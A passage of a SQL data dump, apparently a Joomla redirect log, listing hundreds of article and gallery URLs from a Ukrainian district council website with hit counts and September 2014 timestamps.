00:00:00',301),(2827,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1169:2014-01-08-07-30-47&catid=55&Itemid=96&lang=uk','','','',7,0,'2014-09-20 05:45:24','0000-00-00 00:00:00',301),(2828,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&lang=uk','','','',6,0,'2014-09-20 05:48:21','0000-00-00 00:00:00',301),(2829,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&lang=uk','','','',6,0,'2014-09-20 05:49:08','0000-00-00 00:00:00',301),(2830,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&lang=ru','','','',5,0,'2014-09-20 05:51:07','0000-00-00 00:00:00',301),(2831,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=919:2013-01-31-10-15-40&catid=11&lang=ru&Itemid=','','','',3,0,'2014-09-20 05:52:59','0000-00-00 00:00:00',301),(2832,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=1&lang=ru','','','',2,0,'2014-09-20 05:58:02','0000-00-00 00:00:00',301),(2833,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1331:2014-06-04-07-15-27&catid=59&Itemid=107&lang=ru','','','',3,0,'2014-09-20 05:59:32','0000-00-00 00:00:00',301),(2834,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1348:2014-06-20-13-13-51&catid=59&Itemid=107&lang=ru','','','',3,0,'2014-09-20 06:00:22','0000-00-00 00:00:00',301),(2835,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&catid=57&Itemid=98&lang=uk','','','',1,0,'2014-09-20 06:01:09','0000-00-00 00:00:00',301),(2836,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-20 06:01:16','0000-00-00 00:00:00',301),(2837,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-20 06:06:15','0000-00-00 00:00:00',301),(2838,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=uk','','','',3,0,'2014-09-20 06:06:18','0000-00-00 00:00:00',301),(2839,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-20 06:07:37','0000-00-00 00:00:00',301),(2840,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:-2012-2015-&catid=53:--25102013-&Itemid=94&lang=ru','','','',3,0,'2014-09-20 06:10:32','0000-00-00 00:00:00',301),(2841,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-20 06:13:58','0000-00-00 00:00:00',301),(2842,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',16,0,'2014-09-20 06:15:57','0000-00-00 00:00:00',301),(2843,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-09-20 06:24:22','0000-00-00 00:00:00',301),(2844,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&lang=en&Itemid=','','','',6,0,'2014-09-20 06:25:28','0000-00-00 00:00:00',301),(2845,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=961:2013-03-11-10-51-56&catid=48&Itemid=87&lang=ru','','','',3,0,'2014-09-20 06:25:48','0000-00-00 00:00:00',301),(2846,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=49:--12042013-&Itemid=88&lang=en','','','',4,0,'2014-09-20 06:26:20','0000-00-00 00:00:00',301),(2847,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=844:-2013-&catid=46&Itemid=85&lang=en','','','',8,0,'2014-09-20 06:27:06','0000-00-00 00:00:00',301),(2848,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-------2015-----------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',6,0,'2014-09-20 06:27:32','0000-00-00 00:00:00',301),(2849,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=936:2013-02-21-09-43-43&catid=47&Itemid=86&lang=en','','','',7,0,'2014-09-20 06:28:38','0000-00-00 00:00:00',301),(2850,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:----3110&catid=36&Itemid=70&lang=en','','','',3,0,'2014-09-20 06:29:16','0000-00-00 00:00:00',301),(2851,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=59:--20062014-&Itemid=107&lang=ru','','','',12,0,'2014-09-20 06:30:19','0000-00-00 00:00:00',301),(2852,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:--------------------2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',8,0,'2014-09-20 06:31:34','0000-00-00 00:00:00',301),(2853,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:-3110&catid=57:--15042014-&Itemid=98&lang=en','','','',3,0,'2014-09-20 06:32:26','0000-00-00 00:00:00',301),(2854,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-20 06:33:12','0000-00-00 00:00:00',301),(2855,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=uk&Itemid=','','','',10,0,'2014-09-20 06:34:51','0000-00-00 00:00:00',301),(2856,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=59:--20062014-&Itemid=107&lang=uk','','','',6,0,'2014-09-20 06:36:18','0000-00-00 00:00:00',301),(2857,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-20 06:37:01','0000-00-00 00:00:00',301),(2858,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=894:-2013-2015-&catid=47&Itemid=86&lang=en','','','',5,0,'2014-09-20 06:38:31','0000-00-00 00:00:00',301),(2859,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=933:-2013-2017-&catid=47:-21022013-&Itemid=86&lang=uk','','','',8,0,'2014-09-20 06:42:32','0000-00-00 00:00:00',301),(2860,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-09-20 06:42:53','0000-00-00 00:00:00',301),(2861,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-20 06:43:08','0000-00-00 00:00:00',301),(2862,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-20 06:43:27','0000-00-00 00:00:00',301),(2863,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:--------15--2010---12-l----r&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-09-20 06:46:36','0000-00-00 00:00:00',301),(2864,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-20 06:49:54','0000-00-00 00:00:00',301),(2865,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=uk','','','',4,0,'2014-09-20 06:50:40','0000-00-00 00:00:00',301),(2866,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1153:-2013-&catid=54&Itemid=95&lang=ru','','','',6,0,'2014-09-20 06:51:11','0000-00-00 00:00:00',301),(2867,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',8,0,'2014-09-20 06:52:15','0000-00-00 00:00:00',301),(2868,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:--------15--2010---12-l----r&catid=36&Itemid=70&lang=uk','','','',1,0,'2014-09-20 06:54:59','0000-00-00 00:00:00',301),(2869,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1113:2013-10-23-09-26-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',9,0,'2014-09-20 06:58:12','0000-00-00 00:00:00',301),(2870,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=uk','','','',7,0,'2014-09-20 06:59:03','0000-00-00 00:00:00',301),(2871,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=uk','','','',6,0,'2014-09-20 07:00:05','0000-00-00 00:00:00',301),(2872,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&catid=57:--15042014-&Itemid=98&lang=ru','','','',2,0,'2014-09-20 07:04:54','0000-00-00 00:00:00',301),(2873,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-20 07:06:06','0000-00-00 00:00:00',301),(2874,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-20 07:06:30','0000-00-00 00:00:00',301),(2875,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=32&lang=en','','','',9,0,'2014-09-20 07:09:13','0000-00-00 00:00:00',301),(2876,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-20 07:09:40','0000-00-00 00:00:00',301),(2877,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-20 07:09:57','0000-00-00 00:00:00',301),(2878,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-20 07:11:21','0000-00-00 00:00:00',301),(2879,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1152:2013-11-28-14-58-05&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-20 07:13:51','0000-00-00 00:00:00',301),(2880,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=961:2013-03-11-10-51-56&catid=48&Itemid=87&lang=uk','','','',3,0,'2014-09-20 07:13:59','0000-00-00 00:00:00',301),(2881,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-20 07:15:10','0000-00-00 00:00:00',301),(2882,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11&lang=ru&Itemid=','','','',3,0,'2014-09-20 07:15:27','0000-00-00 00:00:00',301),(2883,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=49:--12042013-&Itemid=88&lang=en','','','',9,0,'2014-09-20 07:17:28','0000-00-00 00:00:00',301),(2884,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',24,0,'2014-09-20 07:20:35','0000-00-00 00:00:00',301),(2885,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-------3--------&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-09-20 07:20:43','0000-00-00 00:00:00',301),(2886,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&lang=uk&Itemid=','','','',4,0,'2014-09-20 07:20:46','0000-00-00 00:00:00',301),(2887,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=32&lang=ru','','','',2,0,'2014-09-20 07:21:23','0000-00-00 00:00:00',301),(2888,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-20 07:25:36','0000-00-00 00:00:00',301),(2889,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-20 07:26:04','0000-00-00 00:00:00',301),(2890,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=en','','','',6,0,'2014-09-20 07:27:43','0000-00-00 00:00:00',301),(2891,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&lang=en','','','',8,0,'2014-09-20 07:28:47','0000-00-00 00:00:00',301),(2892,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-20 07:31:57','0000-00-00 00:00:00',301),(2893,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&catid=57&Itemid=98&lang=uk','','','',5,0,'2014-09-20 07:32:26','0000-00-00 00:00:00',301),(2894,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-20 07:33:21','0000-00-00 00:00:00',301),(2895,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-09-20 07:40:58','0000-00-00 00:00:00',301),(2896,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:-15-2010-12-l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',4,0,'2014-09-20 07:46:25','0000-00-00 00:00:00',301),(2897,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11&Itemid=14&lang=en','','','',14,0,'2014-09-20 07:46:49','0000-00-00 00:00:00',301),(2898,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1153:-2013-&catid=54:--29112013-&Itemid=95&lang=uk','','','',11,0,'2014-09-20 07:47:14','0000-00-00 00:00:00',301),(2899,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&lang=en','','','',8,0,'2014-09-20 07:47:23','0000-00-00 00:00:00',301),(2900,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-------3--------&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-09-20 07:47:41','0000-00-00 00:00:00',301),(2901,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=uk','','','',6,0,'2014-09-20 07:49:29','0000-00-00 00:00:00',301),(2902,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-------3--------&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-20 07:49:33','0000-00-00 00:00:00',301),(2903,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-------3--------&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-09-20 07:50:56','0000-00-00 00:00:00',301),(2904,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=32&lang=uk','','','',2,0,'2014-09-20 07:54:32','0000-00-00 00:00:00',301),(2905,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-20 07:56:16','0000-00-00 00:00:00',301),(2906,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&lang=uk','','','',5,0,'2014-09-20 07:56:54','0000-00-00 00:00:00',301),(2907,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11&lang=uk','','','',6,0,'2014-09-20 08:00:48','0000-00-00 00:00:00',301),(2908,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=32&lang=uk','','','',17,0,'2014-09-20 08:01:10','0000-00-00 00:00:00',301),(2909,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&lang=en','','','',5,0,'2014-09-20 08:04:02','0000-00-00 00:00:00',301),(2910,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=971:-2012-&catid=49:--12042013-&Itemid=88&lang=uk','','','',4,0,'2014-09-20 08:04:52','0000-00-00 00:00:00',301),(2911,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-20 08:07:08','0000-00-00 00:00:00',301),(2912,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:-15-2010-12-l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-09-20 08:08:34','0000-00-00 00:00:00',301),(2913,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=en','','','',3,0,'2014-09-20 08:09:47','0000-00-00 00:00:00',301),(2914,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-20 08:11:50','0000-00-00 00:00:00',301),(2915,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&lang=uk&Itemid=','','','',5,0,'2014-09-20 08:12:02','0000-00-00 00:00:00',301),(2916,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',8,0,'2014-09-20 08:15:13','0000-00-00 00:00:00',301),(2917,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-09-20 08:18:12','0000-00-00 00:00:00',301),(2918,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-20 08:20:58','0000-00-00 00:00:00',301),(2919,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',16,0,'2014-09-20 08:21:44','0000-00-00 00:00:00',301),(2920,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-20 08:22:48','0000-00-00 00:00:00',301),(2921,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-20 08:23:21','0000-00-00 00:00:00',301),(2922,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-20 08:23:53','0000-00-00 00:00:00',301),(2923,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:-15-2010-12-l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2014-09-20 08:24:11','0000-00-00 00:00:00',301),(2924,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-09-20 08:25:09','0000-00-00 00:00:00',301),(2925,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:---------------l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',10,0,'2014-09-20 08:27:34','0000-00-00 00:00:00',301),(2926,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-20 08:29:19','0000-00-00 00:00:00',301),(2927,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=58:--30042014-&Itemid=105&lang=en','','','',16,0,'2014-09-20 08:30:20','0000-00-00 00:00:00',301),(2928,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=en','','','',5,0,'2014-09-20 08:33:37','0000-00-00 00:00:00',301),(2929,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-20 08:33:56','0000-00-00 00:00:00',301),(2930,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-20 08:34:55','0000-00-00 00:00:00',301),(2931,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-09-20 08:36:46','0000-00-00 00:00:00',301),(2932,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-09-20 08:41:04','0000-00-00 00:00:00',301),(2933,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1142:-l-r-&catid=54&Itemid=95&lang=uk','','','',8,0,'2014-09-20 08:41:40','0000-00-00 00:00:00',301),(2934,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11&Itemid=14&lang=en','','','',2,0,'2014-09-20 08:41:45','0000-00-00 00:00:00',301),(2935,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&Itemid=14&lang=ru','','','',12,0,'2014-09-20 08:42:09','0000-00-00 00:00:00',301),(2936,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2013-01-06-09-42-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-20 08:45:46','0000-00-00 00:00:00',301),(2937,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=en','','','',7,0,'2014-09-20 08:45:58','0000-00-00 00:00:00',301),(2938,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=51:--19072013-&Itemid=92&lang=en','','','',4,0,'2014-09-20 08:47:48','0000-00-00 00:00:00',301),(2939,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&lang=en','','','',7,0,'2014-09-20 08:48:58','0000-00-00 00:00:00',301),(2940,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1008:2013-05-20-07-02-57&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-20 08:51:30','0000-00-00 00:00:00',301),(2941,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=919:2013-01-31-10-15-40&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-20 08:52:14','0000-00-00 00:00:00',301),(2942,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=en','','','',3,0,'2014-09-20 08:52:25','0000-00-00 00:00:00',301),(2943,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-20 08:54:12','0000-00-00 00:00:00',301),(2944,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&catid=49&Itemid=88&lang=ru','','','',9,0,'2014-09-20 08:55:55','0000-00-00 00:00:00',301),(2945,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=888:-2012-&catid=46:--21122012&Itemid=85&lang=ru','','','',5,0,'2014-09-20 08:58:33','0000-00-00 00:00:00',301),(2946,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1151:2013-11-28-14-54-33&catid=54&Itemid=95&lang=uk','','','',5,0,'2014-09-20 09:00:15','0000-00-00 00:00:00',301),(2947,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',92,0,'2014-09-20 09:01:52','0000-00-00 00:00:00',301),(2948,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-20 09:03:59','0000-00-00 00:00:00',301),(2949,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=uk','','','',7,0,'2014-09-20 09:04:29','0000-00-00 00:00:00',301),(2950,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-20 09:08:37','0000-00-00 00:00:00',301),(2951,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=uk&Itemid=','','','',6,0,'2014-09-20 09:19:03','0000-00-00 00:00:00',301),(2952,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=893:-2013-2014-&catid=47&Itemid=86&lang=uk','','','',2,0,'2014-09-20 09:19:17','0000-00-00 00:00:00',301),(2953,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=971:-2012-&catid=49&Itemid=88&lang=en','','','',6,0,'2014-09-20 09:22:29','0000-00-00 00:00:00',301),(2954,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:-14-2012-340-l-2012-2013-&catid=47:-21022013-&Itemid=86&lang=ru','','','',3,0,'2014-09-20 09:22:56','0000-00-00 00:00:00',301),(2955,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=919:2013-01-31-10-15-40&catid=11&Itemid=14&lang=uk','','','',4,0,'2014-09-20 09:27:30','0000-00-00 00:00:00',301),(2956,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-20 09:27:46','0000-00-00 00:00:00',301),(2957,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-20 09:31:21','0000-00-00 00:00:00',301),(2958,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-20 09:33:43','0000-00-00 00:00:00',301),(2959,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=en','','','',8,0,'2014-09-20 09:34:38','0000-00-00 00:00:00',301),(2960,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1272:2014-04-09-05-15-36&catid=10&Itemid=17&lang=en','','','',6,0,'2014-09-20 09:34:53','0000-00-00 00:00:00',301),(2961,'http://malyn-rayrada.org.ua/modules/mod_fpss/mod_fpss/templates/JJ-Rasper/template_css.php?w=820&h=140&sw=200','','','',4,0,'2014-09-20 09:35:00','0000-00-00 00:00:00',301),(2962,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1321:-lr-&catid=59:--20062014-&Itemid=107&lang=uk','','','',7,0,'2014-09-20 09:36:12','0000-00-00 00:00:00',301),(2963,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',10,0,'2014-09-20 09:36:53','0000-00-00 00:00:00',301),(2964,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=955:2013-03-07-06-31-04&catid=48&Itemid=87&lang=en','','','',1,0,'2014-09-20 09:37:00','0000-00-00 00:00:00',301),(2965,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',10,0,'2014-09-20 09:37:09','0000-00-00 00:00:00',301),(2966,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=47&Itemid=86&lang=en','','','',5,0,'2014-09-20 09:38:00','0000-00-00 